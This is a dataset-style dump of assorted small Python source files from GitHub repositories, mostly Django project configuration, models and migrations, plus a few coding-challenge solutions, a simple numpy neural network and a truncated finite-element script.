blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acd099225a02f96c7d3c8ff511a976350a843ec3
|
55610cce405fd4f2809bd7d26b4f19b9c2b1d3cd
|
/make_up/migrations/0002_makeuptask_student.py
|
718d9dd7a33b84b0bdd3e99ef57ad00ce51b2c8a
|
[] |
no_license
|
zzzzty/jtdx
|
30d648cf06f259dfb55227a1fb64b74a24afdd85
|
4486d9073416b7df8b93ac47d1b29256a4dff260
|
refs/heads/master
| 2020-06-07T14:02:02.074749
| 2019-12-26T07:46:40
| 2019-12-26T07:46:40
| 193,014,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
# Generated by Django 2.2.2 on 2019-07-06 07:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add a nullable ``student`` foreign key to ``MakeUpTask``.

    Auto-generated by Django 2.2.2. Depends on the student app's
    ``0002_student_nick_name`` migration so the Student model exists
    before the FK is created.
    """
    dependencies = [
        ('student', '0002_student_nick_name'),
        ('make_up', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='makeuptask',
            name='student',
            # null=True keeps existing rows valid; DO_NOTHING performs no
            # DB-side action when a Student is deleted — NOTE(review):
            # confirm dangling references are acceptable for this model.
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='student.Student'),
        ),
    ]
|
[
"zzzliusong@163.com"
] |
zzzliusong@163.com
|
0b48da007baa45e59cf83c9b05f368505db68388
|
3d231cc28740289606b44b358edf33819dc89682
|
/Hacker_rank/hacker_rank_average.py
|
290785d57b22d2af3125d096199b8cba13fd8684
|
[] |
no_license
|
byuvraj/Solution_for_python_challanges
|
f49f031c89e5bb65a80ae6dd2dfbbb3a0b143e25
|
d41e92c5cf93bed3265ff7ec26f8d8d34f149297
|
refs/heads/main
| 2023-08-18T19:41:59.350427
| 2021-10-14T10:53:09
| 2021-10-14T10:53:09
| 373,757,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
if __name__ == '__main__':
    # HackerRank "Finding the percentage": read n students with their
    # scores, then print the queried student's average to 2 decimals.
    n = int(input())
    student_marks = {}
    for _ in range(n):
        # First token is the name; the rest are that student's scores.
        name, *line = input().split()
        scores = list(map(float, line))
        student_marks[name] = scores
    query_name = input()
    marks = student_marks[query_name]
    # sum()/len() replaces the manual index loop; the stray debug
    # print of the raw marks list was removed — it corrupted the
    # expected judged output.
    avg = sum(marks) / len(marks)
    print("{0:.2f}".format(avg))
|
[
"byuvaj0202@gmail.com"
] |
byuvaj0202@gmail.com
|
54348e0bd8926ccdffa383c51db801b380d5f575
|
428f2c48d6e9dabc3ac63012d4146b98bc38efc1
|
/refresh/refresh/wsgi.py
|
5f348f3bcbf706c24a9dad495e9bb99837caa19e
|
[] |
no_license
|
Arange-code/Django-project
|
f96d61fcebe0aa93bd311f86fe0a0f539b0b68f5
|
53527d1f442d87f8ac8f37d0c544168670e054cf
|
refs/heads/master
| 2021-02-05T12:29:56.201975
| 2020-02-28T14:31:58
| 2020-02-28T14:31:58
| 243,780,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for refresh project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'refresh.settings')
application = get_wsgi_application()
|
[
"you@example.com"
] |
you@example.com
|
233695bb1c57dade93d46c11765d5914bc3e29e0
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03039/s199470028.py
|
5afbcf0436e1e2a41276ee67cfaa4072153695af
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
from itertools import combinations
def solve(N, M, K):
    """Return the sum of pairwise axis distances over an N x M grid.

    For each axis, a gap of length ``d`` occurs ``d * (axis - d)`` times
    and is paired with every cell combination on the other axis.
    ``K`` is unused; it is kept for signature compatibility with callers.
    """
    horizontal = sum(dx * (N - dx) for dx in range(N)) * M * M
    vertical = sum(dy * (M - dy) for dy in range(M)) * N * N
    return horizontal + vertical
def main():
    """Read N M K and print a combinatorial sum modulo 1e9+7.

    Looks like a competitive-programming solution (AtCoder p03039):
    total pairwise distance over all placements of K pieces on an
    N x M grid — NOTE(review): inferred from the path, confirm.
    """
    N, M, K = map(int, input().split())
    g1 = [1, 1]  # g1[i] = i! mod p (factorial table; g2 unused below)
    g2 = [1, 1]  # g2[i] = (i!)^-1 mod p
    inverse = [0, 1]  # inverse[i] = modular inverse of i mod p
    mod = 10 ** 9 + 7
    for i in range(2, N * M):
        g1.append((g1[-1] * i) % mod)
        # Standard recurrence: i^-1 = -(p // i) * (p mod i)^-1 (mod p)
        inverse.append((-inverse[mod % i] * (mod // i)) % mod)
        g2.append((g2[-1] * inverse[-1]) % mod)
    t = solve(N, M, 2)
    # Multiply by C(N*M - 2, K - 2): ways to choose the remaining pieces.
    for k in range(2, K):
        t = t * (N * M - k) * inverse[k - 1] % mod
    print(t)
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
e6c4f39cad3a7e6cc5c02477d45d515ac44f6b5b
|
060ff392f361e4141d7d2add4282cd8ec67d055d
|
/musify/asgi.py
|
bc02da036c98fd237532dccce5998c699977136b
|
[] |
no_license
|
omlondhe/ReactDjango-MusifyApp
|
cfe61d85bccd583a2b7658f33b234869af008143
|
4fe3a18b2a425df0a860dcbb572b3a51227779e9
|
refs/heads/main
| 2023-02-06T01:54:31.279052
| 2020-12-28T17:51:31
| 2020-12-28T17:51:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""
ASGI config for musify project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'musify.settings')
application = get_asgi_application()
|
[
"oplondhe@gmail.com"
] |
oplondhe@gmail.com
|
9918758e1b829eee564875e4744dd8f4094f8f34
|
bbefc4e1252b984625bc5b94b244d2e9838e4100
|
/neuralnetwork/neuralNetwork.py
|
e8bd07d938d8993b0597b093db7adf1cad62f94b
|
[] |
no_license
|
ckethan0429/Machine-Learning
|
5a8add0a8c56695b1d874c9f4bc44236b39dcd2d
|
d6d1b5fb2ceda866e8334a0a6d2a8bf5df864a3c
|
refs/heads/master
| 2020-05-03T13:36:22.147819
| 2019-04-02T11:54:33
| 2019-04-02T11:54:33
| 178,656,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,641
|
py
|
import numpy
from scipy.special import expit
import pandas as pd
class neuralNetwork:
    """A 3-layer (input/hidden/output) feed-forward network trained by
    plain backpropagation, with sigmoid activation throughout."""
    # Initialize the neural network
    def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate, path = None):
        # Set the number of nodes in the input, hidden and output layers
        self.inodes = inputnodes
        self.hnodes = hiddennodes
        self.onodes = outputnodes
        # Learning rate
        self.lr = learningrate
        # Weight matrices: load from CSV if a path is given, otherwise
        # sample from N(0, n^-0.5) where n is the fan-in of the layer
        if(path != None) :
            self.load_weight(path)
        else:
            self.wih = numpy.random.normal(0.0, pow(self.hnodes, -0.5), (self.hnodes, self.inodes))
            self.who = numpy.random.normal(0.0, pow(self.onodes, -0.5), (self.onodes, self.hnodes))
        # Use the sigmoid function (scipy's expit) as the activation
        self.activation_function = lambda x: expit(x)
        pass
    def load_weight(self, path):
        """Load weight matrices from <path>_wih.csv / <path>_who.csv.

        NOTE(review): read_csv yields DataFrames, not ndarrays; dot()
        accepts them, but the in-place += in train() may then behave
        differently than with ndarrays — confirm round-tripping.
        """
        self.wih = pd.read_csv(path + "_wih.csv", header=None)
        self.who = pd.read_csv(path + "_who.csv", header=None)
    def save_weight(self, path):
        """Persist both weight matrices as headerless CSV files."""
        pd.DataFrame(self.wih).to_csv(path+ "_wih.csv", index = False, header= None)
        pd.DataFrame(self.who).to_csv(path+ "_who.csv", index = False, header= None)
    # Train the network on one (input, target) pair
    def train(self, inputs_list, targets_list):
        # Convert the input lists to 2-D column vectors
        inputs = numpy.array(inputs_list, ndmin=2).T
        targets = numpy.array(targets_list, ndmin=2).T
        # Signals entering the hidden layer
        hidden_inputs = numpy.dot(self.wih, inputs)
        # Signals emerging from the hidden layer
        hidden_outputs = self.activation_function(hidden_inputs)
        # Signals entering the final output layer
        final_inputs = numpy.dot(self.who, hidden_outputs)
        # Signals emerging from the final output layer
        final_outputs = self.activation_function(final_inputs)
        # Backpropagation: update the two weight matrices
        # Output-layer error (target - actual)
        output_errors = targets - final_outputs
        # Hidden-layer error: output errors split proportionally to weights
        hidden_errors = numpy.dot(self.who.T, output_errors)
        # Gradient-descent step for hidden->output, then input->hidden
        self.who += self.lr * numpy.dot((output_errors * final_outputs * (1.0 - final_outputs)), numpy.transpose(hidden_outputs))
        self.wih += self.lr * numpy.dot((hidden_errors * hidden_outputs * (1.0 - hidden_outputs)), numpy.transpose(inputs))
    # Query the network (forward pass only)
    def query(self, inputs_list):
        # Convert the input list to a 2-D column vector
        inputs = numpy.array(inputs_list, ndmin=2).T
        # Signals entering the hidden layer
        hidden_inputs = numpy.dot(self.wih, inputs)
        # Signals emerging from the hidden layer
        hidden_outputs = self.activation_function(hidden_inputs)
        # Signals entering the final output layer
        final_inputs = numpy.dot(self.who, hidden_outputs)
        # Signals emerging from the final output layer
        final_outputs = self.activation_function(final_inputs)
        return final_outputs
if __name__ == "__main__":
#입력, 은닉, 출력 노드의 수
input_nodes = 3
hidden_nodes = 3
output_nodes = 3
#학습률은 0.3으로 정의
learning_rate = 0.3
#신경망의 인스턴스를 생성
n = neuralNetwork(input_nodes, hidden_nodes,output_nodes, learning_rate)
print("n.query = ", n.query([1.0, 0.5, -1.5]))
|
[
"oops0429@gmail.com"
] |
oops0429@gmail.com
|
6aa35f7716f196962697548423b8318a68aeb789
|
981e6d9d34a91852407d45c4b7863779e228a516
|
/venv/bin/django-admin.py
|
92b413158aeac93a5d38ab2670da12a6bbeeaa4c
|
[] |
no_license
|
starwayagency/astrolabium_viber_bot
|
5062ffcb7b35b3608f9434fd486e5806e9084ae1
|
ec4e699bbc32e7275da0f12d77a0ae5cf32d000e
|
refs/heads/master
| 2023-08-18T06:36:43.315701
| 2021-10-24T18:04:31
| 2021-10-24T18:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
#!/home/jurgeon/projects/astrolabium/astrolabium_viber_bot/venv/bin/python3
# When the django-admin.py deprecation ends, remove this script.
# Compatibility shim installed by Django 3.1: keeps the legacy
# `django-admin.py` entry point working while warning users to migrate.
import warnings
from django.core import management
try:
    from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
    # The warning class is gone, which means Django >= 4.0 is installed
    # and this script no longer has anything valid to delegate to.
    raise ImportError(
        'django-admin.py was deprecated in Django 3.1 and removed in Django '
        '4.0. Please manually remove this script from your virtual environment '
        'and use django-admin instead.'
    )
if __name__ == "__main__":
    warnings.warn(
        'django-admin.py is deprecated in favor of django-admin.',
        RemovedInDjango40Warning,
    )
    # Delegate to the normal management command dispatcher.
    management.execute_from_command_line()
|
[
"jurgeon018@gmail.com"
] |
jurgeon018@gmail.com
|
e9734d05b7e16399760fe649e8c74a4afdef02c4
|
c8b5d05ff16d422ec05addb99f208467f01fa373
|
/tests/Character_tests.py
|
c1133329199065c0a91a490c00f3c6fc7b34fcab
|
[] |
no_license
|
PreslavaKuzova/Dungeons-And-Pythons
|
298105ba51ef4a10e35461c3fcef5818d0934b53
|
5629e63a09a34e5e820383da0509cb67147ec19d
|
refs/heads/master
| 2020-05-07T11:05:20.120814
| 2019-04-15T14:37:42
| 2019-04-15T14:37:42
| 180,445,498
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,138
|
py
|
import unittest
import os, sys
sys.path.insert(0, '../')
from Character import *
class HeroTests(unittest.TestCase):
    """Unit tests for Character health/damage behaviour."""

    def test_init_value(self):
        # Health is stored as given at construction.
        c = Character(20)
        self.assertEqual(c.get_health(), 20)

    def test_take_damage_subtracts_from_health(self):
        # Renamed from "..._and_substract_..." (typo) for clarity.
        c = Character(100)
        c.take_damage(20)
        self.assertEqual(c.get_health(), 80)

    def test_damage_exceeding_health_clamps_health_to_zero(self):
        c = Character(50)
        c.take_damage(60)
        self.assertEqual(c.get_health(), 0)

    def test_damage_exceeding_health_kills_character(self):
        c = Character(50)
        c.take_damage(60)
        self.assertFalse(c.is_alive())

    def test_damage_below_health_leaves_character_alive(self):
        # The original name claimed the character "is_dead" here while
        # the assertion checks it is alive — name fixed to match intent.
        c = Character(60)
        c.take_damage(50)
        self.assertTrue(c.is_alive())

    def test_character_with_zero_health_is_not_alive(self):
        c = Character(0)
        self.assertFalse(c.is_alive())


if __name__ =='__main__':
    unittest.main()
|
[
"preslava.kuzova@gmail.com"
] |
preslava.kuzova@gmail.com
|
8677a029b2db44ceafb04e7963b4cf60db2cacb9
|
532fdd01a9080d9980c18a68789b45b207e68550
|
/aaltomood/urls.py
|
ff8e5a84280efce7778b11e53cf5e51f08288ade
|
[] |
no_license
|
tonipel/aaltomood
|
3b85fe73b2b7bdf7eabcb591db33da276506871c
|
3ef2fb7ee65a166d1c6e7960b6f492dab951625e
|
refs/heads/master
| 2023-01-05T19:26:23.083041
| 2020-11-07T22:06:14
| 2020-11-07T22:06:14
| 310,659,482
| 0
| 0
| null | 2020-11-07T11:47:03
| 2020-11-06T17:12:37
|
Python
|
UTF-8
|
Python
| false
| false
| 913
|
py
|
"""aaltomood URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
from django.contrib.auth import views as auth_views
urlpatterns = [
path('mood/', include('mood.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('django.contrib.auth.urls')),
]
|
[
"toni.pellinen@hotmail.com"
] |
toni.pellinen@hotmail.com
|
90b90c1af562cd40a9888489a3719f6af2d1acba
|
eaad714626b105134a8b6d4d6e316a6aab1e436a
|
/prayas/prayas/urls.py
|
ff37d21e139ea46ca9594cf2875e381e45598a70
|
[] |
no_license
|
pradeeppc/Elearning-Web-App
|
967070e130249423b98111de62269ea8e4fd2312
|
49aeb430b5fecccd49d2a9e9332fcd8f138662a4
|
refs/heads/master
| 2023-03-21T15:28:52.565546
| 2021-03-13T15:16:24
| 2021-03-13T15:16:24
| 149,626,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,359
|
py
|
"""prayas URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.contrib.auth import views as auth_views
from courses.views import CourseListView
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('accounts/login/', auth_views.LoginView.as_view(), name='login'),
path('accounts/logout/', auth_views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
path('course/', include('courses.urls')),
path('', CourseListView.as_view(), name='course_list'),
path('students/', include('students.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
[
"pradeeep765@gmail.com"
] |
pradeeep765@gmail.com
|
094f154dc9007753efa071553ad662baa9cb66f4
|
9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56
|
/google/ads/googleads/v10/enums/types/matching_function_operator.py
|
11a366438b14b5a9625600a5fa27c1e72a1abe49
|
[
"Apache-2.0"
] |
permissive
|
GerhardusM/google-ads-python
|
73b275a06e5401e6b951a6cd99af98c247e34aa3
|
676ac5fcb5bec0d9b5897f4c950049dac5647555
|
refs/heads/master
| 2022-07-06T19:05:50.932553
| 2022-06-17T20:41:17
| 2022-06-17T20:41:17
| 207,535,443
| 0
| 0
|
Apache-2.0
| 2019-09-10T10:58:55
| 2019-09-10T10:58:55
| null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
# Registers this module's messages with proto-plus under the
# google.ads.googleads.v10 marshal (appears to be auto-generated code).
__protobuf__ = proto.module(
    package="google.ads.googleads.v10.enums",
    marshal="google.ads.googleads.v10",
    manifest={
        "MatchingFunctionOperatorEnum",
    },
)
class MatchingFunctionOperatorEnum(proto.Message):
    r"""Container for enum describing matching function operator."""
    class MatchingFunctionOperator(proto.Enum):
        r"""Possible operators in a matching function."""
        UNSPECIFIED = 0
        UNKNOWN = 1
        IN = 2
        IDENTITY = 3
        EQUALS = 4
        AND = 5
        CONTAINS_ANY = 6
# Public API is exactly the manifest declared above.
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"noreply@github.com"
] |
noreply@github.com
|
13feaddae7e89a0fa743ed4afd4a49c1ec6a1f26
|
1701f11946debbca91708f5bb69c494cfbb4fb7a
|
/benwillkommen/benwillkommen/settings.py
|
2f2127bf772da4463f293c31c43a29727963d930
|
[] |
no_license
|
benwillkommen/benwillkommen.com
|
4b3f8515c83a51e13023a402dd79d4759baee3b9
|
b00041d67f910435cc8b9f5d364e1e282cee9775
|
refs/heads/master
| 2020-05-18T18:01:54.760330
| 2014-03-16T03:20:44
| 2014-03-16T03:20:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,549
|
py
|
# Django settings for benwillkommen project.
#modification for playing w/ git
# NOTE(review): DEBUG=True must not ship to production.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    # ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'benwillkommen', # Or path to database file if using sqlite3.
        # The following settings are not used with sqlite3:
        'USER': '',
        'PASSWORD': '',
        'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
        'PORT': '', # Set to empty string for default.
        # Per-connection time zone for this database.
        'TIME_ZONE': 'US/Central'
    }
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'US/Central'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
# NOTE(review): this SECRET_KEY is committed to version control; it should
# be rotated and loaded from the environment instead.
SECRET_KEY = 'j36b4t9$fx#^qmy8nx$*219vsbnp%dp+9yoj3^*#td$^3!i!ah'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'benwillkommen.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'benwillkommen.wsgi.application'
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Uncomment the next line to enable the admin:
    # 'django.contrib.admin',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
)
# JSON session serializer: safer than pickle, but only JSON-serializable
# values may be stored in the session.
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
|
[
"benwillkommen@gmail.com"
] |
benwillkommen@gmail.com
|
10a528647749bc0baae12598193504377e143439
|
f834363c77fed59810549fc61d569ebbaa84de82
|
/blog/database.py
|
91fa4dfa953ee73949b6df890af45aee99db64dc
|
[] |
no_license
|
jonnyfram/blog
|
b77d8aeb5ead1fe7f7659547dc432fb4249d662f
|
db79ab174978a3517bc8143d046247d96fd32aa2
|
refs/heads/master
| 2020-04-06T04:17:25.343030
| 2017-07-06T14:37:04
| 2017-07-06T14:37:04
| 95,437,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,151
|
py
|
import datetime
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Text, DateTime
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from . import app
from flask_login import UserMixin
# Engine and session are wired from the Flask app's config at import time.
engine = create_engine(app.config["SQLALCHEMY_DATABASE_URI"])
Base = declarative_base()
Session = sessionmaker(bind=engine)
# NOTE(review): a single module-level session shared by the whole app;
# likely unsafe across concurrent requests — consider scoped_session.
session = Session()
class Entry(Base):
    """A blog post: title, body text, creation time and author FK."""
    __tablename__ = "entries"
    id = Column(Integer, primary_key=True)
    title = Column(String(1024))
    content = Column(Text)
    # Pass the callable itself, NOT its result: `datetime.now()` would be
    # evaluated once at import time, stamping every row with that moment.
    datetime = Column(DateTime, default=datetime.datetime.now)
    author_id = Column(Integer, ForeignKey('users.id'))
class User(Base, UserMixin):
    """A blog author; UserMixin supplies Flask-Login's session hooks."""
    __tablename__ = "users"
    id = Column(Integer, primary_key=True)
    name = Column(String(128))
    email = Column(String(128), unique=True)
    # NOTE(review): 128 chars suggests a hashed password is stored, but
    # nothing here enforces hashing — confirm at the call sites.
    password = Column(String(128))
    # Entry.author becomes available via this backref.
    entries = relationship("Entry", backref="author")
# Create any missing tables at import time (no-op for existing ones).
Base.metadata.create_all(engine)
|
[
"jonnyfram@gmail.com"
] |
jonnyfram@gmail.com
|
c4f1e1e1f8733b767ee1c04540805b7abc0a0d9b
|
5329cfea55404d9bbff223d761f06e2ec27c1ab7
|
/djangonautic/manage.py
|
6b1f7568039bef8fb496997b55bbbb4df8431254
|
[] |
no_license
|
rohit1717/articles-django-
|
c2d6fe202d62b1c3b56bec25f896fced23247f53
|
669e7186cc1b26b70f87ee8c4b782d0743c5bd8a
|
refs/heads/master
| 2022-12-02T21:44:50.231428
| 2020-08-20T17:54:22
| 2020-08-20T17:54:22
| 289,074,266
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 809
|
py
|
#!/usr/bin/env python
# Standard Django management entry point (pre-3.x template).
import os
import sys
if __name__ == "__main__":
    # NOTE(review): settings module is spelled "djangoautic" while the
    # directory is "djangonautic" — confirm the package name matches.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoautic.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
|
[
"rohitsingh17172000@gmail.com"
] |
rohitsingh17172000@gmail.com
|
87a8307caea5976b9dea43adb38dbb519f275bcd
|
3474b315da3cc5cb3f7823f19a18b63a8da6a526
|
/scratch/KRAMS/src/apps/scratch/jakub/nonlocal_averaging/2d_rotation.py
|
44dd801a3538e23552901d09a1db0e020abcbe31
|
[] |
no_license
|
h4ck3rm1k3/scratch
|
8df97462f696bc2be00f1e58232e1cd915f0fafd
|
0a114a41b0d1e9b2d68dbe7af7cf34db11512539
|
refs/heads/master
| 2021-01-21T15:31:38.718039
| 2013-09-19T10:48:24
| 2013-09-19T10:48:24
| 29,173,525
| 0
| 0
| null | 2015-01-13T04:58:57
| 2015-01-13T04:58:56
| null |
UTF-8
|
Python
| false
| false
| 5,857
|
py
|
from ibvpy.api import \
TStepper as TS, RTraceGraph, TLoop, \
TLine, BCDof, IBVPSolve as IS, DOTSEval, FEDomain, FERefinementGrid,\
FEGrid, BCSlice
from apps.scratch.jakub.mlab.mlab_trace import RTraceDomainListField
from ibvpy.mats.mats2D.mats2D_sdamage.mats2D_sdamage import MATS2DScalarDamage
from ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic
from ibvpy.mats.mats2D.mats2D_sdamage.strain_norm2d import Euclidean, Mazars, Rankine
from ibvpy.fets.fets2D.fets2D4q import FETS2D4Q
from ibvpy.fets.fets2D.fets2D4q9u import FETS2D4Q9U
from ibvpy.fets.fets2D.fets2D4q8u import FETS2D4Q8U
from averaging import UniformDomainAveraging, LinearAF, QuarticAF
from numpy import array, cos, sin, pi,sqrt, deg2rad, arctan
from mathkit.mfn.mfn_line.mfn_line import MFnLineArray
